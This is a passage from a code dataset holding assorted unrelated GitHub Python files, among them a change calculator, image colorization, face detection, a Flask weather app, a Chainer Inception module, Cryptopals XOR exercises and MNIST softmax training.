pennies.\r\n\"\"\"\r\nimport string\r\n\r\ndef main():\r\n\tgivenAmount = input(\"Enter amount given by customer: \")\r\n\tbill = input(\"Enter customer's bill: \")\r\n\t\r\n\ttry:\r\n\t\tchange = float(givenAmount) - float(bill)\r\n\texcept ValueError:\r\n\t\tprint(\"Amount should be a valid integer or decimal value. Eg: 25 or 5.67\")\r\n\t\tmain()\r\n\t\r\n\tif change < 0:\r\n\t\tprint(\"The customer needs to give you more money\")\r\n\t\tmain()\r\n\telif change == 0:\r\n\t\tprint(\"No change to be returned.\")\r\n\telse:\r\n\t\tprint(\"Change = \", change)\r\n\t\tamountParts = str(change).split(\".\")\r\n\t\t\r\n\t\tbigPart = int(amountParts[0])\r\n\t\tsmallPart = int(amountParts[1])\r\n\t\t\r\n\t\tprint(\"You need to return: $\", bigPart, \"and\")\r\n\t\t\r\n\t\t#Getting number of coins\r\n\t\tsmallPart = getQuarters(smallPart)\r\n\t\tsmallPart = getDimes(smallPart)\r\n\t\tsmallPart = getNickels(smallPart)\r\n\t\tgetPennies(smallPart)\r\n\t\t\r\n\t\t\r\ndef getQuarters(smallPart):\r\n\tnumberOfQuarters = 0\r\n\tif smallPart >= 25:\r\n\t\tnumberOfQuarters = int(smallPart / 25)\r\n\t\tsmallPart = smallPart % 25\r\n\t\r\n\tprint(numberOfQuarters,\" quarters.\")\r\n\treturn smallPart\r\n\r\ndef getDimes(smallPart):\r\n\tnumberOfDimes = 0\r\n\tif smallPart >= 10:\r\n\t\tnumberOfDimes = int(smallPart / 10)\r\n\t\tsmallPart = smallPart % 10\r\n\t\r\n\tprint(numberOfDimes,\" dimes.\")\r\n\treturn smallPart\r\n\t\r\ndef getNickels(smallPart):\r\n\tnumberOfNickels = 0\r\n\tif smallPart >= 5:\r\n\t\tnumberOfNickels = int(smallPart / 5)\r\n\t\tsmallPart = smallPart % 5\r\n\t\r\n\tprint(numberOfNickels,\" nickels.\")\r\n\treturn smallPart\r\n\t\r\ndef getPennies(smallPart):\r\n\tnumberOfPennies = 0\r\n\tif smallPart >= 1:\r\n\t\tnumberOfPennies = smallPart\r\n\t\r\n\tprint(numberOfPennies,\" pennies.\")","repo_name":"aishsharma/ChangeCalculator","sub_path":"ChangeCalculator.py","file_name":"ChangeCalculator.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12245824676","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 18 19:54:45 2021\r\n\r\n@author: hanso\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport math\r\n\r\n'''open images'''\r\n\r\norimg = cv2.imread('part_candy.png')\r\norimg = orimg.astype(np.float32)\r\nimg = cv2.imread('dmg_candy.png')\r\nimg = img.astype(np.float32)\r\ngray = cv2.imread('gray_candy.png', cv2.IMREAD_GRAYSCALE)\r\ngray = gray.astype(np.float32)\r\nb,g,r = cv2.split(img)\r\nprint (gray)\r\n\r\n'''parameters'''\r\nt=10\r\ngemma =0.1\r\np=2\r\nIm = np.zeros((100,100))\r\nk=0\r\nfor i in range (0,100):\r\n for j in range (0,100):\r\n if (i==j):\r\n Im[i,j] = 1\r\n\r\ngivenb = np.zeros((100,1))\r\ngiveng = np.zeros((100,1))\r\ngivenr = np.zeros((100,1))\r\nfor j in range(0,50):\r\n givenb[j,0] = b[24,j]\r\n giveng[j,0] = g[24,j]\r\n givenr[j,0] = r[24,j]\r\n givenb[j+50,0] = b[25,j]\r\n giveng[j+50,0] = g[25,j]\r\n givenr[j+50,0] = r[25,j]\r\n'''kernel'''\r\nkD = np.zeros((100,100))\r\nfor j in range (0,50):\r\n for y in range (0,50):\r\n kD[j,y] = math.exp(-((gray[24,j] - gray[24,y])**p)/4/t)\r\n kD[j,y+50] = math.exp(-((gray[24,j] - gray[25,y])**p)/4/t)\r\n kD[j+50,y+50] = math.exp(-((gray[25,j] - gray[25,y])**p)/4/t)\r\n kD[j+50,y] = math.exp(-((gray[25,j] - gray[24,y])**p)/4/t)\r\n \r\nkCD = np.zeros((2500,100))\r\nfor x in range (0,50):\r\n for y in range (0,50):\r\n for j in range (0,50):\r\n kCD[y+x*50,j] = math.exp(-((gray[x,y]-gray[24,j])**p)/4/t)\r\n kCD[y+x*50,j+50] = math.exp(-((gray[x,y]-gray[25,j])**p)/4/t)\r\n\r\nprint(kD)\r\n'''linear sovler'''\r\nAb = np.linalg.solve(kD+gemma*100*Im, givenb)\r\nAg = np.linalg.solve(kD+gemma*100*Im, giveng)\r\nAr = np.linalg.solve(kD+gemma*100*Im, givenr)\r\nFb = np.matmul(kCD,Ab)\r\nFg = np.matmul(kCD,Ag)\r\nFr = np.matmul(kCD,Ar)\r\nprint(Ab)\r\nprint(Fb)\r\n\r\n\r\nnewb=np.zeros((50,50))\r\nnewg=np.zeros((50,50))\r\nnewr=np.zeros((50,50))\r\nfor i in range (0,50):\r\n for j in range(0,50):\r\n newb[i,j] = Fb[k,0]\r\n newg[i,j] = Fg[k,0]\r\n newr[i,j] = Fr[k,0]\r\n k+=1\r\n\r\nprint(k)\r\nprint(b[25,:])\r\nprint(newb[25,:])\r\n'''show results'''\r\ncolored = cv2.merge([newb,newg,newr])\r\nimg = np.clip(img, 0, 255).astype(np.uint8)\r\norimg = np.clip(orimg, 0, 255).astype(np.uint8)\r\ncolored = np.clip(colored, 0, 255).astype(np.uint8)\r\ngray = np.clip(gray, 0, 255).astype(np.uint8)\r\ncv2.imshow('original' , orimg)\r\ncv2.imshow('given' , img)\r\ncv2.imshow('result' , colored)\r\ncv2.imshow('gray' , gray)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"tzhang417/Reproducing-Kernel-Hilbert-Space-Image-Coloring-Based-on-Grayness","sub_path":"rkhs.py","file_name":"rkhs.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21073616417","text":"#pip install pip install opencv-python \r\nimport cv2\r\nfrom random import randrange\r\n\r\n#load some pretrained data on face frontals from open cv (haar cascade algotithm (git hub opencv the data ))\r\ntrained_face_data = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\n#choose an image to detect faces\r\nwebcam = cv2.VideoCapture(0)\r\n\r\n#iterate over frames\r\nwhile True:\r\n\r\n #read current frame\r\n successful_frame_read, frame = webcam.read()\r\n\r\n\r\n #convert to greyscale\r\n greyscaled_img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n #detect faces\r\n face_coordinates = trained_face_data.detectMultiScale(greyscaled_img)\r\n\r\n #draw rectangle\r\n for (x , y, w, h) in face_coordinates:\r\n #(x , y, w, h)=face_coordinates[0]\r\n cv2.rectangle(frame ,(x, y), (x+w , y+h) , (randrange(256), randrange(256), randrange(256)), 5)\r\n \r\n #display\r\n cv2.imshow(\"sabya's Face detection app\" ,frame)\r\n \r\n #one is added so that the frame change evry 1millisecond without key press\r\n key = cv2.waitKey(1)\r\n\r\n if key == 27: # exit on ESC\r\n break\r\n#release video capture\r\nwebcam.release()\r\n\r\n\r\nprint(\"code completed\")","repo_name":"sm1216/python","sub_path":"Face_detector2.py","file_name":"Face_detector2.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72774973174","text":"# 친구와 친구의 친구까지 초대\nimport sys\ninput = sys.stdin.readline\nfrom collections import deque\n\n# 동기 수 (1-indexing)\nn = int(input())\n# 리스트 길이\nm = int(input())\n\ngraph = [[] for _ in range(n+1)]\nvisited = [False]*(n+1)\n\nfor _ in range(m):\n a,b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n \ndef search(start):\n visited[start] = True\n que = deque()\n que.append([start,0])\n answer=0\n while que:\n node,connect = que.popleft()\n if connect==2:\n continue\n for nextNode in graph[node]:\n if not visited[nextNode]:\n answer+=1\n visited[nextNode]=True\n que.append([nextNode, connect+1])\n return answer\n \nprint(search(1))","repo_name":"JangAyeon/Algorithm","sub_path":"23-1/boj/5567.py","file_name":"5567.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43597629417","text":"from flask import Flask, render_template, request\r\nfrom getdata import get_weather_data\r\nfrom parseweatherdata import parse_weather_data\r\nimport Flask_Table\r\n\r\napp = Flask(__name__)\r\n\r\ntotal_weather_data = []\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template(\"index.html\")\r\n\r\n@app.route('/addlocation', methods = ['POST'])\r\ndef add_another():\r\n global total_weather_data\r\n location = request.form['location']\r\n location_start = request.form['start_date']\r\n location_end = request.form['end_date']\r\n\r\n all_location_weather_data = get_weather_data(location)\r\n location_weather_data = parse_weather_data(all_location_weather_data, location_start, location_end)\r\n for day_num in location_weather_data:\r\n location_weather_data[day_num]['location'] = location\r\n total_weather_data.append(location_weather_data)\r\n return render_template('addanother.html')\r\n\r\n@app.route('/addanother', methods=['POST'])\r\ndef create_forecast():\r\n global total_weather_data\r\n if 'submit' in request.form.values():\r\n items = Flask_Table.create_flask_table(total_weather_data)\r\n table = Flask_Table.ItemTable(items)\r\n return render_template('forecast.html', html_table = table)\r\n else:\r\n print('adding another location')\r\n return render_template('index.html')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n\r\n\r\n\r\n","repo_name":"apham727/WeatherForItinerary","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73036318453","text":"import numpy\n\nfrom chainer.functions.activation import relu\nfrom chainer.functions.array import concat\nfrom chainer.functions.pooling import average_pooling_2d\nfrom chainer.functions.pooling import max_pooling_2d\nfrom chainer import link\nfrom chainer.links.connection import convolution_2d\nfrom chainer.links.normalization import batch_normalization\n\n\nclass InceptionBN(link.Chain):\n\n \"\"\"Inception module of the new GoogLeNet with BatchNormalization.\n\n This chain acts like :class:`Inception`, while InceptionBN uses the\n :class:`BatchNormalization` on top of each convolution, the 5x5 convolution\n path is replaced by two consecutive 3x3 convolution applications, and the\n pooling method is configurable.\n\n See: `Batch Normalization: Accelerating Deep Network Training by Reducing \\\n Internal Covariate Shift `_.\n\n Args:\n in_channels (int): Number of channels of input arrays.\n out1 (int): Output size of the 1x1 convolution path.\n proj3 (int): Projection size of the single 3x3 convolution path.\n out3 (int): Output size of the single 3x3 convolution path.\n proj33 (int): Projection size of the double 3x3 convolutions path.\n out33 (int): Output size of the double 3x3 convolutions path.\n pooltype (str): Pooling type. It must be either ``'max'`` or ``'avg'``.\n proj_pool (bool): If ``True``, do projection in the pooling path.\n stride (int): Stride parameter of the last convolution of each path.\n conv_init: A callable that takes ``numpy.ndarray`` or\n ``cupy.ndarray`` and edits its value.\n It is used for initialization of the convolution matrix weights.\n Maybe be ``None`` to use default initialization.\n dtype (numpy.dtype): Type to use in\n ``~batch_normalization.BatchNormalization``.\n\n .. seealso:: :class:`Inception`\n\n Attributes:\n train (bool): If ``True``, then batch normalization layers are used in\n training mode. If ``False``, they are used in testing mode.\n\n \"\"\"\n\n def __init__(self, in_channels, out1, proj3, out3, proj33, out33,\n pooltype, proj_pool=None, stride=1, conv_init=None,\n dtype=numpy.float32):\n super(InceptionBN, self).__init__(\n proj3=convolution_2d.Convolution2D(\n in_channels, proj3, 1, nobias=True, initialW=conv_init),\n conv3=convolution_2d.Convolution2D(\n proj3, out3, 3, pad=1, stride=stride, nobias=True,\n initialW=conv_init),\n proj33=convolution_2d.Convolution2D(\n in_channels, proj33, 1, nobias=True, initialW=conv_init),\n conv33a=convolution_2d.Convolution2D(\n proj33, out33, 3, pad=1, nobias=True, initialW=conv_init),\n conv33b=convolution_2d.Convolution2D(\n out33, out33, 3, pad=1, stride=stride, nobias=True,\n initialW=conv_init),\n proj3n=batch_normalization.BatchNormalization(proj3, dtype=dtype),\n conv3n=batch_normalization.BatchNormalization(out3, dtype=dtype),\n proj33n=batch_normalization.BatchNormalization(proj33,\n dtype=dtype),\n conv33an=batch_normalization.BatchNormalization(out33,\n dtype=dtype),\n conv33bn=batch_normalization.BatchNormalization(out33,\n dtype=dtype),\n )\n\n if out1 > 0:\n assert stride == 1\n assert proj_pool is not None\n self.add_link('conv1',\n convolution_2d.Convolution2D(in_channels, out1, 1,\n stride=stride,\n nobias=True,\n initialW=conv_init))\n self.add_link('conv1n', batch_normalization.BatchNormalization(\n out1, dtype=dtype))\n self.out1 = out1\n\n if proj_pool is not None:\n self.add_link('poolp', convolution_2d.Convolution2D(\n in_channels, proj_pool, 1, nobias=True, initialW=conv_init))\n self.add_link('poolpn', batch_normalization.BatchNormalization(\n proj_pool, dtype=dtype))\n self.proj_pool = proj_pool\n\n self.stride = stride\n self.pooltype = pooltype\n if pooltype != 'max' and pooltype != 'avg':\n raise NotImplementedError()\n\n self.train = True\n\n def __call__(self, x):\n test = not self.train\n outs = []\n\n if self.out1 > 0:\n h1 = self.conv1(x)\n h1 = self.conv1n(h1, test=test)\n h1 = relu.relu(h1)\n outs.append(h1)\n\n h3 = relu.relu(self.proj3n(self.proj3(x), test=test))\n h3 = relu.relu(self.conv3n(self.conv3(h3), test=test))\n outs.append(h3)\n\n h33 = relu.relu(self.proj33n(self.proj33(x), test=test))\n h33 = relu.relu(self.conv33an(self.conv33a(h33), test=test))\n h33 = relu.relu(self.conv33bn(self.conv33b(h33), test=test))\n outs.append(h33)\n\n if self.pooltype == 'max':\n p = max_pooling_2d.max_pooling_2d(x, 3, stride=self.stride, pad=1,\n cover_all=False)\n else:\n p = average_pooling_2d.average_pooling_2d(x, 3, stride=self.stride,\n pad=1)\n if self.proj_pool is not None:\n p = relu.relu(self.poolpn(self.poolp(p), test=test))\n outs.append(p)\n\n y = concat.concat(outs, axis=1)\n return y\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/pfnet_chainer/chainer-master/chainer/links/connection/inceptionbn.py","file_name":"inceptionbn.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"73888441332","text":"\"\"\"\nCook the current dish and add the value satisfaction[index] * time; the next dish will be cooked at time time + 1, so add the value of dp[index + 1]time + 1].\nSkip the current dish, and then the next dish will be cooked at time time, hence the value dp[index + 1][time]\n\"\"\"\nclass Solution:\n\t# TOP-DOWN\n def maxSatisfaction(self, satisfaction: List[int]) -> int:\n satisfaction.sort()\n memo = {}\n def dp(i, time):\n if i == len(satisfaction):\n return 0\n if (i, time) in memo:\n return memo[(i, time)]\n res = max(satisfaction[i]*time + dp(i+1, time+1), dp(i+1, time))\n memo[(i, time)] = res\n return res\n return dp(0, 1)\n\n\n # BOTTOM-UP\n def maxSatisfaction(self, satisfaction: List[int]) -> int:\n satisfaction.sort()\n n = len(satisfaction)\n # dp[i][t]: max sum starting from dish i\n dp = [[0 for i in range(n+2)] for i in range(n+1)]\n for i in range(n-1, -1, -1):\n for time in range(n, 0, -1):\n # print(i, time)\n dp[i][time] = max(satisfaction[i] * time + dp[i+1][time+1], dp[i+1][time])\n \n return dp[0][1]\n\n\n # BOTTOM-UP\n def maxSatisfaction(self, satisfaction: List[int]) -> int:\n satisfaction.sort()\n n = len(satisfaction)\n prev = [0 for i in range(n+2)]\n for i in range(n-1, -1, -1):\n # dp[t]: max sum starting from time t\n dp = [0 for i in range(n+2)]\n for time in range(n, 0, -1):\n # print(i, time)\n dp[time] = max(satisfaction[i] * time + prev[time+1], prev[time])\n prev = dp\n \n return prev[1]\n\n\n\n ","repo_name":"xiaofanc/leetcode","sub_path":"1402-reducing-dishes.py","file_name":"1402-reducing-dishes.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45151201251","text":"import random\n\nnum = int(input(\"Digite um numero entre 0 e 5 \"))\nnum1 = random.randint(0,5)\nprint(num1)\nif num1 == num:\n print(\"Voce acertou, parabens\")\n quit()\nelse:\n print(\"Voce errou, tente novamente\")\n","repo_name":"ThalisRuan/Exerc-cios-Python---Curso-em-V-deo","sub_path":"Desafio.26.py","file_name":"Desafio.26.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8461024264","text":"# Standard library imports\nimport os\nimport sys\n\n# Third imports\nimport sqlite3\nimport pandas as pd\nfrom typing import List\n\nclass ModifyDB:\n \"\"\"\n Class to modify the euronations.db\n \"\"\"\n def __init__(self, db: str = \"euronations.db\"):\n self.db = sqlite3.connect(db)\n\n def insert_in_db(\n self, \n nation_name:str = None, \n city_name:str = None, capitol:bool=False, population:int=0,\n EU:bool=False, NATO:bool=False, commonwealth:bool=False):\n \"\"\"\n insert new value in the database\n \"\"\"\n # ------------\n # Nation Table\n # ------------\n cur_n = self.db.cursor()\n cur_n.execute(\"\"\"SELECT COUNT(id) FROM nations;\"\"\")\n size_of_n = str(cur_n.fetchall()[0][0] + 1)\n\n cur_n.execute(\n \"\"\"\n INSERT INTO nations(id, nation)\n VALUES(?,?)\"\"\",\n (str(size_of_n), nation_name),\n )\n\n # ------------\n # Cities Table\n # ------------\n cur_c = self.db.cursor()\n cur_c.execute(\"\"\"SELECT COUNT(city) FROM cities;\"\"\")\n size_of_c = str(cur_c.fetchall()[0][0] + 1)\n\n cur_c.execute(\n \"\"\"\n INSERT INTO cities(id, nation_id, city, capitol, population)\n VALUES(?,?,?,?,?)\"\"\",\n (str(size_of_c), size_of_n, city_name, capitol, population), #str(rigth_wrong)\n )\n\n # ------------\n # Nation Table\n # ------------\n cur_o = self.db.cursor()\n cur_o.execute(\"\"\"SELECT COUNT(id) FROM organizations;\"\"\")\n size_of_o = str(cur_o.fetchall()[0][0] + 1)\n\n cur_o.execute(\n \"\"\"\n INSERT INTO organizations(id, nation_id, EU, NATO, commonwealth)\n VALUES(?,?,?,?,?)\"\"\",\n (str(size_of_o), size_of_n, EU, NATO, commonwealth),\n )\n\n self.db.commit()\n","repo_name":"MattiaCinelli/EuroNations-SQLitePy","sub_path":"euronations/modify_db.py","file_name":"modify_db.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35229539583","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfirstRow = 1\nlastRow =31\ncurrentRow = firstRow\n\nwhile currentRow <= lastRow :\n print(\"Row number\", currentRow)\n currentRow+=1\n\n\n# In[3]:\n\n\nstart = 0\nend = 16\nx = start\n\nwhile x<=end:\n print(x, 2**x)\n x+=1\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Pasiak/UDEMY_PythonFirstSteps","sub_path":"UDEMY_S1_S2/01.77_While.py","file_name":"01.77_While.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20534911724","text":"import array\n\n# Fixed XOR: takes two equal-length binary strings and produces XOR combination.\ndef fxor(str1, str2):\n assert len(str1) == len(str2), \"String lengths must be equal.\"\n arr1 = array.array('B', str1)\n arr2 = array.array('B', str2)\n for i in range(len(arr1)):\n arr1[i] ^= arr2[i]\n return arr1.tostring()\n\n# Take a string str1 and pad with chars to length.\ndef str_pad(str1, length, chars):\n repeats = (length // len(chars)) + 1\n pad = chars*repeats\n str1 += pad\n return str1[:length]\n\n# Repeating key XOR: takes a string and repeating key and produces XOR combination.\ndef rxor(str1, key):\n key = str_pad(key, len(str1), key)\n return fxor(str1, key)\n\n# Guesses 1-byte XOR key for string.\ndef guess_1byte_xor(str1):\n str_len = len(str1)\n scores = {}\n texts = {}\n for i in range(32, 126):\n key = chr(i)\n key_str = key * str_len\n plaintext = fxor(str1, key_str)\n texts[key] = plaintext\n scores[key] = score(plaintext)\n key = max(scores, key=scores.get)\n high_score = scores[key]\n text = texts[key]\n # print 'key: ' + key\n # print 'text: ' + text\n return {'key': key, 'score': high_score, 'text': text}\n\n# Score a string based on enlish letter frequencies.\ndef score(str1):\n str1 = str1.lower()\n frequencies = letter_frequencies()\n ss = 0.0\n for letter in frequencies.iterkeys():\n expected_frequency = frequencies[letter]\n actual_frequency = str1.count(letter)\n ss += pow(actual_frequency - expected_frequency, 2)\n return ss\n\n# Take hex-encoded string and convert to base64.\ndef hex2b64(hex_str):\n return hex_str.decode('hex').encode('base64')\n\n# Return dict of english letter frequencies.\ndef letter_frequencies():\n return {'a':0.08167, 'b':0.01492, 'c':0.02782, 'd':0.04253, 'e':0.12702, 'f':0.02228, 'g':0.02015, 'h':0.06094, 'i':0.06966, 'j':0.00153, 'k':0.00772, 'l':0.04025, 'm':0.02406, 'n':0.06749, 'o':0.07507, 'p':0.01929, 'q':0.00095, 'r':0.05987, 's':0.06327, 't':0.09056, 'u':0.02758, 'v':0.00978, 'w':0.02360, 'x':0.00150, 'y':0.01974, 'z':0.00074, ' ':0.21}\n\n# Compute Hamming distance between two strings.\ndef hamming(str1, str2):\n return sum(tobits(fxor(str1, str2)))\n\n# Convert string to bits (from stackoverflow).\ndef tobits(s):\n result = []\n for c in s:\n bits = bin(ord(c))[2:]\n bits = '00000000'[len(bits):] + bits\n result.extend([int(b) for b in bits])\n return result\n\n# Guess rxor keysize.\ndef rxor_keysize(str1):\n keysizes = {}\n for keysize in range(2, 40):\n distance = 0\n blocks = [ str1[keysize*i:keysize*(i+1)] for i in range(4) ]\n for i in range(4):\n for j in range(i):\n if (i != j):\n distance += hamming(blocks[i], blocks[j])\n keysizes[keysize] = distance / float(keysize)\n return min(keysizes, key=keysizes.get)\n\n# Crack rxor\ndef rxor_crack(str1, keysize):\n blocks = [ str1[keysize*i:keysize*(i+1)] for i in range(len(str1)/keysize)]\n tblocks = {}\n for i in range(keysize):\n keyblock = ''\n for j in range(len(blocks)):\n keyblock = keyblock + blocks[j][i]\n tblocks[i] = keyblock\n key = ''\n for i in range(keysize):\n key = key + guess_1byte_xor(tblocks[i])['key']\n return key\n\ndef pad_pkcs7(str1, length):\n return str_pad(str1, length, \"\\x04\")\n","repo_name":"danepowell/cryptopals","sub_path":"python/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7476164065","text":"import concurrent.futures\nimport scrapper\nfrom download import read_urls, download, unzip_all\nimport os\n\ndef main():\n urls_file = 'urls.txt'\n download_dir = 'downloads'\n if not os.path.exists(urls_file):\n print(\"-------------------- Scrapping --------------------------------------------------\")\n scrapper.start(urls_file)\n urls = read_urls(urls_file)\n print('--------------------------- Downloading ---------------------------------------------')\n print(f'# Files to download: {len(urls)}')\n with concurrent.futures.ThreadPoolExecutor(max_workers=6) as executor:\n executor.map(download, urls)\n unzip_all(download_dir)\n os.remove(urls_file)\n\nif __name__ == '__main__':\n main()","repo_name":"rogerramosruiz/hdri-downloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19685915447","text":"def composition(k, genome):\n return sorted((genome[i:i + k] for i in range(len(genome) - k + 1)))\n\n\nif __name__ == '__main__':\n with open('dataset.txt') as f:\n text = f.read()\n\n result = composition(\n int(text.split()[0]),\n text.split()[1])\n\n with open('result.txt', 'w') as r:\n print('\\n'.join(result), file=r)","repo_name":"vladsavelyev/bioinformatics_coursera","sub_path":"4_assembly/composition.py","file_name":"composition.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34079475980","text":"class CommandLine:\n __action: str = ''\n\n __name: str = ''\n\n __token1: str = ''\n\n __token2: str = ''\n\n __value: str = ''\n\n __checksum: str = ''\n\n __format: str = ''\n\n __verbose: bool = False\n\n __list: bool = False\n\n __key: str = ''\n\n __valid_actions: [str] = [\n 'add',\n 'clear',\n 'config',\n 'delete',\n 'get',\n 'help',\n 'list',\n 'version',\n 'view'\n ]\n\n @property\n def action(self) -> str:\n return self.__action\n\n @action.setter\n def action(self, value: str):\n self.__action = value\n\n @property\n def name(self) -> str:\n return self.__name\n\n @name.setter\n def name(self, value: str):\n self.__name = value\n\n @property\n def token1(self) -> str:\n return self.__token1\n\n @token1.setter\n def token1(self, value: str):\n self.__token1 = value\n\n @property\n def token2(self) -> str:\n return self.__token2\n\n @token2.setter\n def token2(self, value: str):\n self.__token2 = value\n\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value: str):\n self.__value = value\n\n @property\n def checksum(self) -> str:\n return self.__checksum\n\n @checksum.setter\n def checksum(self, value: str):\n self.__checksum = value\n\n @property\n def format(self) -> str:\n return self.__format\n\n @format.setter\n def format(self, value: str):\n self.__format = value\n\n @property\n def verbose(self) -> bool:\n return self.__verbose\n\n @verbose.setter\n def verbose(self, value: bool):\n self.__verbose = value\n\n @property\n def list(self) -> bool:\n return self.__list\n\n @list.setter\n def list(self, value: bool):\n self.__list = value\n\n @property\n def key(self) -> str:\n return self.__key\n\n @key.setter\n def key(self, value: str):\n self.__key = value\n\n def is_valid_action(self, action: str) -> bool:\n return action in self.__valid_actions\n\n def __init__(self, args: [str]):\n self.__parse(args)\n\n def __parse(self, args: [str]):\n if len(args) == 0:\n return\n\n if self.is_valid_action(args[0]):\n # Remove the first element from the array.\n self.action = args.pop(0)\n else:\n # Assume it's ./rpass \n self.action = 'get'\n self.name = args.pop(0)\n\n while len(args) > 0:\n current_arg = args.pop(0)\n\n # First check if there is an argument AFTER the argument that begins with \"--\".\n if current_arg[:2] == '--' and len(args) == 0:\n # These are the switches.\n if current_arg not in ['--verbose', '--list']:\n raise Exception('Argument {0} has no value set'.format(current_arg))\n\n # And now continue with everything else.\n if current_arg == '--name':\n self.name = args.pop(0)\n elif current_arg == '--token1':\n self.token1 = args.pop(0)\n elif current_arg == '--token2':\n self.token2 = args.pop(0)\n elif current_arg == '--value':\n self.value = args.pop(0)\n elif current_arg == '--checksum':\n self.checksum = args.pop(0)\n elif current_arg == '--key':\n self.key = args.pop(0)\n elif current_arg == '--format':\n self.format = args.pop(0)\n elif current_arg == '--verbose':\n self.verbose = True\n elif current_arg == '--list':\n self.list = True\n else:\n raise Exception('Unknown argument: {0}'.format(current_arg))\n\n def validate(self):\n if self.action == 'add':\n if len(self.name) == 0:\n raise Exception('--name not specified')\n elif len(self.token1) == 0:\n raise Exception('--token1 not specified')\n elif len(self.token2) == 0:\n raise Exception('--token2 not specified')\n elif len(self.key) == 0:\n raise Exception('--key not specified')\n elif self.action == 'config':\n if not self.list:\n if len(self.name) == 0:\n raise Exception('--name not specified')\n elif self.action in ['delete', 'view']:\n if len(self.name) == 0:\n raise Exception('--name not specified')\n elif self.action == 'get':\n #\n # Can be:\n # --name NAME\n # --token1 AAA --token2 BBB\n if len(self.name) == 0:\n if len(self.token1) == 0 and len(self.token2) == 0:\n raise Exception('Please specify either the name or the 2 tokens')\n\n if len(self.token1) == 0 or len(self.token2) == 0:\n raise Exception('Please specify both tokens')\n elif self.action in ['clear', 'list']:\n # Nothing to do here.\n pass\n","repo_name":"sadreck/rpass-python","sub_path":"src/commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36447049807","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 15 17:55:35 2017\n\n@author: yuqing.wang1\n\"\"\"\n\n\n# SOFTMAX - ALL IN ONE\n\nfrom keras.datasets import mnist\nimport numpy as np\n\n# load data\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = X_train.reshape((X_train.shape[0], np.product(X_train.shape[1:]))).T / 255.0\nX_test = X_test.reshape((X_test.shape[0], np.product(X_test.shape[1:]))).T / 255.0\n\n# parameters\n\n(D, N) = X_train.shape\nC = len(np.unique(y_train))\n\neps = 1e-03\nstep = 0.5\n\n# init W\n\nW = np.zeros((D, C))\n\np = np.exp(W.T.dot(X_train))\np /= np.sum(p, axis=0)\n\n# optimization\n\nloss = 1e10\nlast_loss = 0\n\nwhile np.abs(loss - last_loss) > eps:\n # compute gradient\n dW = X_train.dot(p.T) / N\n for k in range(C):\n dW[:,k] -= np.sum(X_train[:,y_train==k], axis=1) / N\n\n # gradient descent\n W -= step * dW\n\n # compute loss\n p = np.exp(W.T.dot(X_train))\n p /= np.sum(p, axis=0)\n\n last_loss = loss\n loss = 0\n for k in range(C):\n loss += - np.sum(np.log(p[k,y_train==k])) / N\n print ('Loss:', loss)\n\n# test\n\np = np.exp(W.T.dot(X_test))\np /= np.sum(p, axis=0)\n\ny = np.argmax(p, axis=0)\nacc = np.sum(y==y_test) * 1.0 / len(y)\nprint ('Accuracy:', acc)\n\nimport matplotlib.pyplot as plt\n\nnumber = 2\nplt.imshow(W[:,number].reshape([28, 28]), cmap ='gray')\n\nx = plt.imread('1.5.jpg') # generated by Photoshop\nplt.imshow(x, cmap='gray')\n\nx = (x / 255.0).reshape((28*28,1))\np = np.exp(W.T.dot(x))\np /= np.sum(p, axis=0)\nprint ('predicted to be:', 